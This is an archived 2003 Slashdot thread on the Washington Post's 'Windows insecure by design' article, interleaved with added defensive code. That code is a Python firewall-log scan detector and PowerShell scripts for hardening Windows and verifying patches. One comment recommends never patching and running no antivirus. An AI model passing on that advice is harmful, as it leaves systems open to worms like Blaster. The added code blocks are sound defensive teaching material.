      To break into Download.com's top fifty lists, a Windows program must approach 30,000 downloads a week, to make the Mac list, a bare---some would say pathetic--- eight hundred.

      The simplest conclusion to be drawn from such numbers is that it is difficult for even the most aggressive worm or virus to bring down more than the tiniest fraction of the installed Windows base.

      ---not because Windows systems are "inherently secure," but because the Windows user base is so immense an infection can be contained before it becomes unmanageable, or even visible to users. For anyone who auto-magically installed the RPC patch on July 16th, the hoo-rah after must have come as quite a surprise.

  88. Re:It's not Windows' fault by hankaholic · · Score: 4, Insightful

    In a response to a recent story, someone mentioned that UNIX standards were generally based upon specifications which had been made publically available for comment.

    This is something that many take for granted, but it is quite important. RFCs are discussed publicly, and people review protocols independently of specific implementations. This means that the protocols themselves are refined, and implementors only have to worry about correctly coding to a given specification.

    Under Windows, the specification is often "whatever works with this code is fine". This invites much less review of the protocols, and since the protocols are ill-defined, it's difficult to determine whether the protocol has been implemented correctly.

    --
    Somebody get that guy an ambulance!
  89. Redist versions of Windows patches by yerricde · · Score: 2, Informative

    Windows patches come in both a Windows Update version (downloaded through an ActiveX control through windowsupdate.microsoft.com) and a "redist" version (downloaded through any graphical web browser).

    --
    Will I retire or break 10K?
  90. What...? by EdMcMan · · Score: 2, Insightful

    I love Microsoft bashing as much as the next Linux user, but this article doesn't make much sense. Linux machines are targeted very often in security issues. If you have an unsecured Linux machine on the internet, it will either succumb to a worm, or be hacked by script kiddies. Most admins don't even usually notice script kiddie hacks (think monitoring thousands of servers..). Yes, Windows is insecure by design. So is Linux. So is *gasp* OpenBSD. Software written by humans is insecure by design.

  91. Re:JRTFA by abirdman · · Score: 5, Insightful

    Right on. My experience was the same. I was immunized from BLASTER on July 17th according to the log from MS Update. It's very hip and au courant to ignore MS Updates, because they're a pain, and their Service Packs don't have a great reputation. But updating early and often has kept me out of trouble.

    When I started getting Sobig emails on Tuesday, I even took the time to call two of my friends (who subscribe to some of the same lists I do) to warn them not to trust emails with attachments. I had to explain the whole concept to them, but they got it. I got 40 the first day, 20 the second and only a handful since. And I had no desire to open any of them.

    The biggest threat that Windows poses is that from users who are totally clueless... they turn on their machine thinking it's some kind of "email machine" and nothing else. Not a clue there are threats or risks out there. And no indication from Windows, or Outlook, or IE that anything they do could be unsafe. Windows update works, at least this time it did. They're not going to get more savvy, so there's no harm in telling people to use windows update.

    Tell your friends:
    1. Don't preview email
    2. Delete email you don't know or trust
    3. Don't open attachments if they're not absolutely known and expected
    4. Update early and often

    The article is right, Windows is dangerous. MS isn't going to tell the consumer, because that would threaten their (considerable) cash flow.

    I'll shut up now.

    --
    Everything I've ever learned the hard way was based on a statistically invalid sample.
  92. Re:I have a coworker who kept saying it was hardwa by AJWM · · Score: 3, Insightful

    Agreed that developers aren't IT support (well, unless they're developing apps for IT). But they ought to know how to keep their desktops running.

    Heck, I used to develop in a shop where any developer above "junior programmer" was expected to know how to reinstall the OS (Solaris, Ultrix or AIX), configure it for Oracle, install Oracle, install our software (a GIS system), and generally manage their own workstations. Ditto for the sales support guys'n'gals and the trainers (although the latter might need some phone support).

    Would you have automotive engineers or even car salesmen that don't know how to drive, check the oil and put gas in the car?

    --
    -- Alastair
  93. Re:Don't worry... by ceejayoz · · Score: 2, Informative

    Never got a single virus in five years of using Outlook - I only just recently moved to Mozilla Thunderbird for the spam filtering.

    Honestly, any user with an ounce of common sense can use Outlook perfectly safely. That e-mail with the pidgin English and the .vbs attachment? Don't run the attachment! Simple enough...

  94. NSA Secure Linux going into the standard kernel by Animats · · Score: 4, Informative
    On August 13, 2003, with little publicity, the NSA Secure Linux was merged into the mainline Linux kernel. It's in 2.6.0-test3 and later kernels. There's also useful documentation at the sysadmin level, and the beginnings of a multilevel secure X-windows system.

    It's not a magic bullet, but mandatory security just went mainstream.

    What this all means is the ability to put programs into levels and compartments from which they can't escape. Security breaches in the mail handler or the web server can't propagate to the rest of the system.

    The code is open source, GPL, and written by the United States Department of Defense's National Security Agency. It looks like Microsoft's attempt to shut down that project failed.

  95. In other news... by MegaFur · · Score: 2, Funny
    Windows Is 'Insecure By Design,' Says Washington Post

    In other news, really, really smart scientists that spent a lot of grant money determined that: living people breathe (air), fish generally live in water, Battlefield Earth was a mind-witheringly bad movie, and cutting down a tree with a herring is inherently impractical.

    Windows Insecure By Design? a world of ***!!DUH!!*** It's nice to see the general public starting to wake up to this fact. Expect to see the standard ports (135, 445, etc) closed when Longhorn comes out... maybe. And even then, I doubt MS will make any other changes. Or, if they do, they'll open up five or six more ports in the process. :-P Not that I'm bitter... oh no.

    Let's never forget the conversation between a fictional Steve Jobs and Bill Gates in "Pirates of Silicon Valley":
    fictional Steve Jobs: We're better than you are. We have better stuff.
    fictional Bill Gates: You don't get it, Steve--that doesn't matter!

    --
    Furry cows moo and decompress.
  96. Dorms the breeding grounds?? by pair-a-noyd · · Score: 4, Interesting

    I just took my son to college this weekend and set his pc up for him. (Ah yes, dad knows FAR more about computers than jr...)

    We dropped his stuff off in his dorm and discovering there was only one ethernet jack in his room we left for Best Buy to grab a cheapy hub so he could plug his LINUX box, his PS/2 and his roommate all into the single lan jack.

    Well, we blew off the hub because his roommate called his cell phone and said he was "bringing a *thing* from home to hook both of *them* up at once"..

    So, assuming he was talking about a hub we blew that off. Well, we got back and discovered the roomy had plugged a cordless phone into the lan jack. I pulled the cord and announced that they were lucky system security didn't come up and billy club someone for crashing planet earth into the moon by plugging the phone into the lan jack. The roomy was sitting there looking like he had crapped his pants.

    I plugged my son's pc into the lan and fired it up to make sure it was configured properly with the college system and it was fine.

    My son is using Mandrake 9.1 w/KDE 3.1.3tex.

    Now, when you fire up Linux *MOST* people are going to say something, it's different you know and if a NORMAL person has a few brain cells functioning, they will notice something is different and not only ask questions but come over to watch..

    Nope. Roomy sat there waiting for his chair to blast off, he could have been watching me pilot the starship Enterprise as far as he knew.

    I very quickly drew the conclusion that this kid was not only dead in the head, his computer skills are less than ZERO.. I asked him what he has, he told me he has a laptop with Windows 98. Whee! How fun can that be??!!

    There were hundreds of kids lugging brand new Compaq and Dell boxes in and they *ALL* had big fat, "WINDOWS XP installed" stickers on them.

    You can bet your ass that those kids will be ate up with that shit, probably already, if not for sure by the coming weekend.

    Those kids, by dragging all those XP boxes in were building a big petri dish for the script kiddies to play...

    I can say this. I'm damn glad my kid is using Linux, I don't have to worry about him getting caught up in all these childish virus/worm/trojan games. This shit has gone way, way too far.

    I'm not going to pump all my money into repairing his PC (600+ miles from home) every few days, dumping money down the toilet on anti-virus crapware that does not work, and paying $200 for an OS that just brings you constant headaches.

    I told my son that if he wants to stay in that school then the Linux stays on his PC and M$ is forbidden on his machine. If he changes it or lets someone change it, that's it. He goes to local community college with the local idiot beerheads..

    1. Re:Dorms the breeding grounds?? by andrewski · · Score: 2, Funny

      God, you should give your kid some oregano and tell him to make his tuition by selling it as grass. Sounds like these kids aren't just dumb enough to smoke it, they're dumb enough to get really high in the process!

  97. NO! Please don't mail update CDs by DFossmeister · · Score: 2, Interesting

    I find the article's amusing suggestion that MS could send update CDs to everyone on the planet scary. It's bad enough that I get my monthly AOL CD. I don't want a quarterly MS CD either.

    Did anyone else notice this, or was it just me?

    --
    No, Not Again! It's what's for dinner.
  98. Re:I have a coworker who kept saying it was hardwa by dtfinch · · Score: 4, Funny

    Some of us developers working for smaller businesses need to handle EVERYTHING.

    "Hey, Dave, make our fundamentally different, colocated e-commerce sites securely share all their data amongst each other and seemlessly integrate it with this new proprietary MRP solution. Upgrade our computers when we're not using them. Find a legal way to install this one copy of Office onto all these computers. Make our computers faster and better. Don't touch my computer. Upgrade our Norton Antivirus server and all our clients. None of us want login passwords, but we do want security. This one mid-90's era server ought to be enough for all our needs. We want video conferencing on all our sites. We don't want to buy anything."

    I do almost as much IT support as I do development.

  99. The best feature of non-outlook email programs by AsmordeanX · · Score: 2, Insightful

    The best feature of non-Outlook email programs is the inability or difficulty that they have running activex, java, or javascript.

    To this date I have yet to receive a single email that has ever needed to use any script or programming language to deliver the message, so why the heck is it still in and ON by default?

    Ah well, all I can do is my part. I patch and have a linux based firewall protecting me. That firewall has had nearly 3000 hits on 135,137, or 139 in the past two days. A month ago it would have had no more than 12 in the same period.
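
Counting those hits is the obvious detection to hang on comment 99, so here is an added Python example (mine, not the poster's firewall or any real log): it parses netfilter LOG-style kernel lines, tallies probes at 135/137/139/445 per source, compares the total with a quiet-period baseline the way the poster compares two days against a month earlier, and separately flags sources that ping a host and then try TCP/135, the Welchia/Nachi pattern. The log lines are constructed and use documentation addresses; the port labels are my own.

```python
"""Count probes at the RPC/NetBIOS/SMB ports in netfilter LOG lines and
compare against a quiet-time baseline. Editorial example with constructed data."""
import re
from collections import Counter, defaultdict

FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")

# Ports the worms of that week knocked on (assumption: labels are my own).
WATCHED_PORTS = {135: "MS RPC", 137: "NetBIOS name", 139: "NetBIOS session", 445: "SMB"}


def parse_line(line):
    """Extract the fields we need from a netfilter LOG line, or None."""
    if "kernel:" not in line or "SRC=" not in line:
        return None
    fields = {}
    for key, value in FIELD_RE.findall(line):
        fields.setdefault(key, value)      # ICMP lines carry a second ID=; keep the first
    return {
        "src": fields.get("SRC"),
        "dst": fields.get("DST"),
        "proto": fields.get("PROTO"),
        "dpt": int(fields["DPT"]) if fields.get("DPT") else None,
        "icmp_type": int(fields["TYPE"]) if fields.get("TYPE") else None,
    }


def summarize(lines, watched=WATCHED_PORTS):
    """Hits per watched port, and per source within each port."""
    hits, sources = Counter(), defaultdict(Counter)
    other = unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
        elif rec["dpt"] in watched:
            hits[rec["dpt"]] += 1
            sources[rec["dpt"]][rec["src"]] += 1
        else:
            other += 1
    return {"hits": dict(hits),
            "sources": {p: dict(c) for p, c in sources.items()},
            "other": other, "unparsed": unparsed}


def scan_alert(summary, baseline_hits, factor=10):
    """Alert when watched-port hits reach `factor` times the quiet-time count."""
    total = sum(summary["hits"].values())
    return {"total": total, "baseline": baseline_hits,
            "alert": total >= factor * max(baseline_hits, 1)}


def nachi_like_sources(lines):
    """Sources that sent an ICMP echo request and then knocked on TCP/135:
    the Welchia/Nachi pattern of pinging a host before attacking it."""
    pinged, rpc = set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"] == "ICMP" and rec["icmp_type"] == 8:
            pinged.add(rec["src"])
        elif rec["proto"] == "TCP" and rec["dpt"] == 135:
            rpc.add(rec["src"])
    return sorted(pinged & rpc)


# Constructed sample: one host sweeping 135 across neighbours, one ping-then-135
# source, a NetBIOS/SMB prober, ordinary web traffic and an unrelated sshd line.
SAMPLE_LOG = """\
Aug 22 09:00:01 gw kernel: IN=ppp0 OUT= MAC= SRC=203.0.113.5 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=1 DF PROTO=TCP SPT=1025 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 22 09:00:03 gw kernel: IN=ppp0 OUT= MAC= SRC=203.0.113.5 DST=198.51.100.3 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=2 DF PROTO=TCP SPT=1026 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 22 09:00:05 gw kernel: IN=ppp0 OUT= MAC= SRC=203.0.113.5 DST=198.51.100.4 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=3 DF PROTO=TCP SPT=1027 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 22 09:01:10 gw kernel: IN=ppp0 OUT= MAC= SRC=198.51.100.77 DST=198.51.100.2 LEN=60 TOS=0x00 PREC=0x00 TTL=128 ID=4 PROTO=ICMP TYPE=8 CODE=0 ID=512 SEQ=1
Aug 22 09:01:11 gw kernel: IN=ppp0 OUT= MAC= SRC=198.51.100.77 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=5 DF PROTO=TCP SPT=3001 DPT=135 WINDOW=65535 RES=0x00 SYN URGP=0
Aug 22 09:02:00 gw kernel: IN=ppp0 OUT= MAC= SRC=192.0.2.9 DST=198.51.100.2 LEN=78 TOS=0x00 PREC=0x00 TTL=120 ID=6 PROTO=UDP SPT=137 DPT=137 LEN=58
Aug 22 09:02:30 gw kernel: IN=ppp0 OUT= MAC= SRC=192.0.2.9 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=120 ID=7 DF PROTO=TCP SPT=1100 DPT=139 WINDOW=8192 RES=0x00 SYN URGP=0
Aug 22 09:03:00 gw kernel: IN=ppp0 OUT= MAC= SRC=192.0.2.9 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=120 ID=8 DF PROTO=TCP SPT=1101 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
Aug 22 09:04:00 gw kernel: IN=ppp0 OUT= MAC= SRC=192.0.2.200 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=55 ID=9 DF PROTO=TCP SPT=40000 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 22 09:04:01 gw sshd[123]: Accepted publickey for admin from 192.0.2.201 port 50000
"""
```

The per-source breakdown is what turns a count into something actionable: a handful of addresses sweeping consecutive destinations on 135 is a worm, while a single host touching 139 once is somebody's misconfigured laptop.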

  100. Coincidence? by Spectrum_Leap · · Score: 4, Insightful

    Mac and Linux not targeted? Taking the view of a malicious hacker, why would you bother coding a virus that only affected a minority of computer users? If Linux ever really makes it mainstream, you may find it's just as susceptible.

    1. Re:Coincidence? by gregm · · Score: 2, Insightful

      Oh bullshit.... Imagine a virus that shutdown every linux box attached to the net. I'm talking routers firewalls, web and email servers, etc, etc. That would be a big deal and a big feather in the cap of a virus writer. Google would go down! oh just thinking about it scares me.

      G

  101. Cars to Computers analogy by TWX · · Score: 4, Insightful

    Well, checking the oil I'd put more akin to checking free resources. Same for most of the other fluids in the car, short of fuel. Fuel's akin to turning the thing on in the first place. Do these people need to know how to operate the turn signals, trunk release, windshield wipers, domelight, etc? I'd rate them as your basic intelligent car owner.

    As for changing fluids out, the computer equivalent would be to a backyard mechanic, who handles oil and antifreeze coolant. Maybe checks the tranny fluid and takes it somewhere if it doesn't look right. Changes out burned out lights, etc. Stuff that is mostly covered in the owner's manual, or at least has stuff like fluid quantities. In computers, I'd equate that with being able to hook up external devices and get them to work, being able to remove stuff from C:\WINDOWS\START MENU\PROGRAMS\STARTUP, configure basic network settings from instructions for something like DSL or Cable. Calls for support or a technician when something out of this range goes wrong.

    A+ certified technicians would equivalently handle basics, like replacing alternators, starters, draining transmission fluid, replacing water pumps, checking differential gear oil, lubing the suspension or steering parts, replacing obviously bad water hoses, and the like. Stuff that stands out. By comparison to computers the person would be able to replace hard disk drives and CD-ROMs, install video cards, install the OS from scratch for the default configuration, configure sound support, and the like. Maybe even dig into the registry a smidgeon.

    And above that you'd have your power-technicians, who would be up there with not being afraid to remove stuff like engines, axles, transmissions, steering columns, dash boards, interior parts, etc. These people would be able to play with advanced networking, deal with driver and IRQ conflicts, handle tweaking of the OS, dig into the registry a bit, etc.

    Beyond that, you find different people who can rebuild engines or transmissions in their sleep, modify sheet metal artistically, handle advanced upgrading of suspension, and the like. They would in computer equivalents be specialized, but very talented. They probably wouldn't even do much of the lower-level work unless they had to, because they would be more valuable higher.

    Well, that was quite long enough of a ramble...

    --
    Do not look into laser with remaining eye.
    1. Re:Cars to Computers analogy by Anonymous+Shepard · · Score: 2, Interesting
      "A+ certified techicians would equivalently handle basics, like replacing alternators, starters, draining transmission fluid, replacing water pumps, checking differential gear oil, lubing the suspension or steering parts, replacing obviously bad water hoses, and the like. Stuff that stands out. By comparison to computers the person would be able to replace hard disk drives and CD-ROMs, install video cards, install the OS from scratch for the default configuration, configure sound support, and the like. Maybe even dig into the registry a smidgeon."
      I think it is rather silly to talk about a "technician" of any degree in a case like this. I have changed and installed harddrives, CD-ROM drives and various cards inside the box. I have installed my OS (Windows several times, Mandrake Linux twice), formatted and partitioned harddrives, and even occasionally been "dig[ging] into the registry a smidgeon".

      But I wouldn't consider myself a "technician", even in a metaphorical sense; I have an education in the humanities. I am miles and miles away from doing any serious computer-related work, such as programming.

      The reason I can do these things is because the OS installation interface today is extremely simple (for the needs of the normal computer user), and the preconfigured way the OS and various programs work is still annoying enough (I'm talking about Windows here) that I feel I have no choice but tweaking a bit. And the hardware interface is also rather obvious; in most cases one really has to go out of one's way to connect anything wrongly inside the box, or mess up anything seriously if doing so. I am able to use the software and hardware resources I have to use, and I cannot afford having anyone else to help me with them. That's all. I enjoy doing this, to a certain degree.
      --
      I have a life. I really do. I've just chosen to ignore it.
  102. Was Windows designed as a network OS? by megazoid81 · · Score: 3, Insightful

    Is it possible that Windows was never designed with security from the start because it was not designed for a network from the start? MS entered the networking and Internet game pretty late and with it came all the worms, trojans and other stuff. Of course, this assumes that the constituents of present-day Windows have a lot in common with the pre-TCP/IP Windows of old. Still, I think it could be one way of looking at the fundamentally insecure design of Windows.

  103. Complete with ad for "Windows 2003 Server." by spoot · · Score: 4, Funny

    I thought it was amusing when I surfed over to the Post to read the article there was an ad for "Windows 2003 Server" on the page. I had to take a screen shot. If you want it it's here --> http://johnford.net/images/windows_ad01.jpg

  104. Windows does not have to be insecure. by facelessnumber · · Score: 5, Interesting

    ...Or, "The Ten Commandments of Windows Security."

    I run Linux on my servers, but for compatibility, certain programs I need, etc., etc., my workstations use XP. I haven't patched anything. I don't trust the patches and especially not the Service Packs. They can break things and slow things down. If my box is working, why tempt fate? There are a few, very simple things to do that will keep Windows almost entirely secure:

    1 - No scripting host. If you don't need it, kill it.

    2 - No Outlook. Outlook is bad. IE is almost as bad. Everyone should know this by now. And if you must use it...

    3 - Don't open file attachments from anybody unless you know what the hell they are! Why is this so difficult? Well, it's because people never...

    4 - Unhide the file extensions. You wouldn't eat something from a package simply labeled "food" without having some clue what's in it, so why double-click an icon without knowing what it will do? Learn what these extensions are, and Google it if you're not sure what a given one means.

    5 - Don't use IE if you don't have to. Mozilla's now advanced and stable enough that you should almost never have to use IE to properly view a site. I never have a problem with popups, and I've never had my browser hijacked. Using IE tempts people to break #6...

    6 - Read the question before you answer "Yes." Do you walk around at work slackjawed and answering "yes" to every question you're asked without listening? If you weren't specifically looking for what a site wants you to install, chances are you don't need it.

    7 - Firewall. Buy a $30 broadband router, build a Linux gateway, enable XP's own, built-in, pre-installed firewall, or get something like Zone Alarm, depending on your needs and/or level of computer literacy.

    8 - Don't download software without knowing exactly what it is. Read the license agreement. Sure, I like to check out neat toys on Download.com too, but not if I have to install Gator or GAIN to use them. See #6. Read!

    9 - Check your processes, and read what's going on in there. Google each one. This is a pain in the ass the first time, but do it once and then you'll know when something's not supposed to be there.

    10 - Watch who gets your email address. Get two. One for ordering/registering things, and one that you only give to real people.

    That's it. I run no antivirus software and my system thanks me for it with good performance. I have not loaded a Service Pack, a patch, anything. None of this is difficult. These rules are simple enough for almost anyone to follow, and the major ones are extremely easy.
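
Items 1, 4, 7 and 9 of the list above are host settings that can be applied and verified from a script. The PowerShell below is an added example, not the poster's code: it targets a modern Windows host (Windows 8 / Server 2012 or later, PowerShell 5.1+, NetSecurity module). The two registry values are the same ones XP honoured; the firewall cmdlets and Get-AuthenticodeSignature did not exist in 2003, where the firewall was switched on with "netsh firewall set opmode enable". Function names are my own.

```powershell
#Requires -RunAsAdministrator
# Added example (not the poster's code): scripts commandments 1, 4, 7 and 9.
# Assumes Windows 8 / Server 2012 or later with PowerShell 5.1+ and the
# NetSecurity module. Function names are invented for this example.

function Disable-ScriptHost {
    # 1 - No scripting host. wscript.exe and cscript.exe consult this value and
    # refuse to run .vbs/.js/.wsf files for every user when it is 0.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name Enabled -PropertyType DWord -Value 0 -Force | Out-Null
    return ((Get-ItemProperty -Path $key -Name Enabled).Enabled -eq 0)
}

function Show-FileExtensions {
    # 4 - Unhide the file extensions. With HideFileExt = 1 Explorer shows
    # "invoice.pdf.exe" as "invoice.pdf", which is the trick attachment worms
    # rely on. Explorer picks the new value up after a restart.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    Set-ItemProperty -Path $key -Name HideFileExt -Value 0 -Type DWord
    return ((Get-ItemProperty -Path $key -Name HideFileExt).HideFileExt -eq 0)
}

function Enable-HostFirewall {
    # 7 - Firewall. Turn the built-in firewall on for every profile and drop
    # unsolicited inbound connections, which is the path the RPC worm in the
    # story used to reach unpatched hosts.
    Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled True -DefaultInboundAction Block
    $off = @(Get-NetFirewallProfile | Where-Object { $_.Enabled -ne 'True' })
    return ($off.Count -eq 0)
}

function Get-SuspiciousProcess {
    # 9 - Check your processes. Instead of searching every name, start with
    # images that are unsigned, carry a broken signature, or run from outside
    # the Windows and Program Files trees. This is a starting point for
    # investigation, not a verdict: unsigned is not the same as malicious.
    $trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
    Get-Process | Where-Object Path | ForEach-Object {
        $proc = $_
        $sig = Get-AuthenticodeSignature -FilePath $proc.Path
        $inTrustedDir = $false
        foreach ($root in $trustedRoots) {
            if ($proc.Path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inTrustedDir = $true }
        }
        if ($sig.Status -ne 'Valid' -or -not $inTrustedDir) {
            $publisher = $null
            if ($sig.SignerCertificate) { $publisher = $sig.SignerCertificate.Subject }
            [pscustomobject]@{
                Name      = $proc.ProcessName
                Id        = $proc.Id
                Path      = $proc.Path
                Signature = $sig.Status
                Publisher = $publisher
            }
        }
    }
}

Disable-ScriptHost
Show-FileExtensions
Enable-HostFirewall
Get-SuspiciousProcess | Format-Table -AutoSize
```

Each of the first three functions returns $true only after re-reading the setting it changed, so the script doubles as an audit when run a second time. Get-SuspiciousProcess is deliberately noisy: third-party software installed outside Program Files will show up, and the reviewer still has to decide what belongs.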

  105. MS Marketing department security bulletin ratings by lanalyst · · Score: 4, Informative

    This is what grabs me: a new vulnerability with MDAC announced on 8/20 is rated as 'Important'. Same buffer overflow problem as 026.. same potential for damage.. most/all corporate customers have MDAC running.. but it doesn't rate a 'Critical'. Are they waiting for exploit code to appear or are they waiting for the sh!tstorm to die down?

  106. Another one for the compost pile by davmoo · · Score: 2, Interesting

    While Microsoft certainly has its problems, this attitude is pretty much, in my opinion, bullshit. If the statistics were reversed and Apple or Linux had 95% of the market you'd see just as much trashing on those systems as you see now on Windows. Script kiddies are going to attack whatever gets them the most attention. And attacking something that only has 3% of the market does not get them that attention.

    It's the same philosophy of why more Corvettes get stolen than Yugos. Nobody wants a Yugo.

    Yes, Windows has internal problems. All OSes do. It's a fact of life.

    --
    I want a new quote. One that won't spill. One that don't cost too much. Or come in a pill.
    1. Re:Another one for the compost pile by burns210 · · Score: 2, Insightful

      Nope. I call BS.

      If Apple had a worm sent around by email (or whatever), you know what would happen... you would get it (after the user who sent it to you clicked the OK box before the worm auto-sent itself to your mail list), it would ask you to open the program and whether you want to execute the code; if you chose yes, then it would do whatever damage it could do... that is, after you clicked OK and let it do it.

      Just because MS is a bigger target doesn't mean they don't shoot themselves in the foot. Running arbitrary code automatically without a prompt, along with sending bulk email without getting permission, are BUGS, not features.

    2. Re:Another one for the compost pile by andrewski · · Score: 2, Interesting

      You are fooling yourself with specious reasoning. It's much tougher to make a virus for OS X or Linux than it is for Windows. It's because of this that we see more Windows viruses than any other reason. Any OS has design flaws, but none approach the retardedness of Windows.

  107. Never Ascribe to Conspiracy.... by jefu · · Score: 2, Interesting
    The saying goes "Never ascribe to malice that which is adequately explained by stupidity."

    And I think that goes for "conspiracy" too.

    Though I do expect that MS will happily exploit their laxness in building their systems if they can do it in such a way as to make their monopoly permanent and legally required.

  108. Umm... by tomkit · · Score: 2

    Umm...I didn't read people's posts, but what about the fact that Mac and Linux make up only a small percentage of the OS used today? Who would want to create worms with a target of ~5% of computer users?

  109. Re:JRTFA by caouchouc · · Score: 2, Informative

    There are some unlucky people who practiced due diligence and thought they were patched, but were not.

    Windows Update had (and still has) a flaw in that it checks registry keys to determine if you have patches installed, rather than the files themselves. Sometimes the registry key is inserted but some or all of the actual patch files are not, for one reason or another. This happened to many people on July 17th, and they were probably really surprised when they got hit by the MS Blaster worm.

    One particularly noteworthy victim of this flaw is the US Army.
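
The gap the poster describes is easy to check for yourself: the update database is a claim, the file versions on disk are the evidence. The PowerShell below is an added example, not from the post. It reads the claim with Get-HotFix (which, like XP's Windows Update, reports from the servicing metadata rather than from the binaries) and compares it against the files the patch should have replaced. KB823980 is the MS03-026 RPC/DCOM fix that Blaster exploited, and rpcss.dll is one of the files it ships; the version string in the sample table is a placeholder, so take the real file list and versions from the bulletin for whichever patch you are verifying.

```powershell
# Added example (not from the post): cross-check the update database's claim
# that a patch is installed against the file versions actually on disk.
# Assumes Windows with Get-HotFix (Win32_QuickFixEngineering). The file/version
# table passed in below is a constructed placeholder, not bulletin data.

function Test-PatchFiles {
    param(
        [Parameter(Mandatory)] [string]    $KB,             # e.g. 'KB823980'
        [Parameter(Mandatory)] [hashtable] $ExpectedFiles   # full path -> minimum version string
    )
    # What the servicing metadata says. This is the same kind of record the
    # XP-era Windows Update trusted: a registry entry, not the binary.
    $claimed = $null -ne (Get-HotFix -Id $KB -ErrorAction SilentlyContinue)

    $fileResults = foreach ($path in $ExpectedFiles.Keys) {
        $min = [version] $ExpectedFiles[$path]
        if (Test-Path -LiteralPath $path) {
            $info = (Get-Item -LiteralPath $path).VersionInfo
            # FileVersion is free text; the *Part fields are the numeric version.
            $actual = [version] ('{0}.{1}.{2}.{3}' -f $info.FileMajorPart, $info.FileMinorPart,
                                                       $info.FileBuildPart, $info.FilePrivatePart)
            [pscustomobject]@{ File = $path; Expected = $min; Actual = $actual; Ok = ($actual -ge $min) }
        } else {
            [pscustomobject]@{ File = $path; Expected = $min; Actual = $null;   Ok = $false }
        }
    }

    [pscustomobject]@{
        KB                    = $KB
        RegistrySaysInstalled = $claimed
        FilesVerified         = (@($fileResults | Where-Object Ok).Count -eq $ExpectedFiles.Count)
        Files                 = @($fileResults)
    }
}

# Constructed example: placeholder minimum version, not the real MS03-026 value.
$result = Test-PatchFiles -KB 'KB823980' -ExpectedFiles @{
    "$env:SystemRoot\System32\rpcss.dll" = '5.1.2600.0'
}

if ($result.RegistrySaysInstalled -and -not $result.FilesVerified) {
    # The exact failure mode from the post: the record exists, the files do not match.
    Write-Warning "$($result.KB): registry says installed but the files on disk do not match; reinstall the patch."
} elseif (-not $result.RegistrySaysInstalled) {
    Write-Warning "$($result.KB): not recorded as installed."
}
$result.Files | Format-Table -AutoSize
```

The interesting outcome is the first branch: RegistrySaysInstalled is true while FilesVerified is false. A scanner that only reads the registry will report such a machine as patched, which is why the worm found "patched" hosts.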

  110. Re:I have a coworker who kept saying it was hardwa by dtfinch · · Score: 2, Informative

    How long ago was that?

    There's Bochs, which is free and will emulate an x86 on almost anything, including the Mac, but it's not very fast.

    And since about 1994, there have been Macs that can run Windows using a built-in x86 compatible processor, like having two computers in one. You could switch between them by pressing a simple key combination, and it came with software to help you do things like copy and paste between them. The high school I attended had one.

    My bosses generally don't believe in "can't", but most of the time they're right.

  111. MS About to Capitalize on Flaws by Web+Goddess · · Score: 2, Interesting

    In the past week, the Merc has been running articles quoting Microsoft authorities as saying, essentially, "Honest Injun we WANTED to require automatic updates, but we thought people would be paranoid of our intentions, so we made updates optional! Now look at the chaos!"

    My prediction: There WILL be an attempt by Microsoft, probably successful, to make sure all future Windows versions automatically check for and download updates -- not only bug fixes, but also updates for furthering their own inimical combinations of big brother and forced marketing.

    - Wendy

  112. This story is nice by inkswamp · · Score: 4, Funny
    So Windows is insecure by design, huh?

    It's so nice to see Microsoft finally get something right.

    --
    --Rick "If it isn't broken, take it apart and find out why."
  113. Disappointing omission by Baki · · Score: 2, Interesting

    What the article talks about is merely "insecure by configuration", not "by design".

    OK, MSFT could and should improve in creating a more secure default configuration, but I expected the article to be more interesting regards the "design" of windows:

    Graphics in the kernel, no true multi-user system and filesystem permissions. That, IMO, is what makes Windows insecure by design. And those are issues that won't be so easy to fix without large rewrites and without breaking a lot of backwards compatibility. The configuration in contrast can be fixed quite easily. It is on a deeper level where the real trouble is.

  114. users are dumb too by CowBovNeal · · Score: 2, Interesting

    To see the magnitude of the problem, go to download.com and check the user opinions of the software listed there.

    Lets say you go to see the user opinions of Mailwasher Pro or Disruptor OL.

    These programs integrate with Outlook Express and are very easy to configure.

    Now half the people who gave these programs negative reviews did so because they couldn't fsking understand what to do.

    Whose fault is it then? When they can't understand easy programs like Mailwasher or Disruptor, then how do you expect them to figure out stuff in Linux?

    For these dumb heads, there is nothing you can do.

    It's a known fact that the easier a firewall is to install and configure, the more insecure it is.

    A good firewall should be one where you need to configure many of the options yourself.

    Is somebody going to tell that to the users of Zone Alarm which pretty much needs no configuration?

    Linux is more secure because a lot of stuff is configurable.

    --
    Bush is on fire and its not good for my lungs.
    1. Re:users are dumb too by jonadab · · Score: 2, Insightful

      > Linux is more secure because a lot of stuff is configurable.

      There is truth here. Remember the /. article a while back about how it's hard to find a stock build of Apache in the wild because all the distros add stuff or make changes? There've been several security advisories relevant to Apache in the last year, but though I have Apache running on several systems I was impacted by exactly zero of them, apart from having to read the security advisory to determine whether I needed to be concerned.

      Configuring options rather than being happy with defaults is not a magic tonic to solve every problem, but it is a contributing factor to security.

      --
      Cut that out, or I will ship you to Norilsk in a box.
  115. The prize quote: by geschild · · Score: 2, Insightful

    Coming late to this discussion but I still have to say this even if nobody reads it...

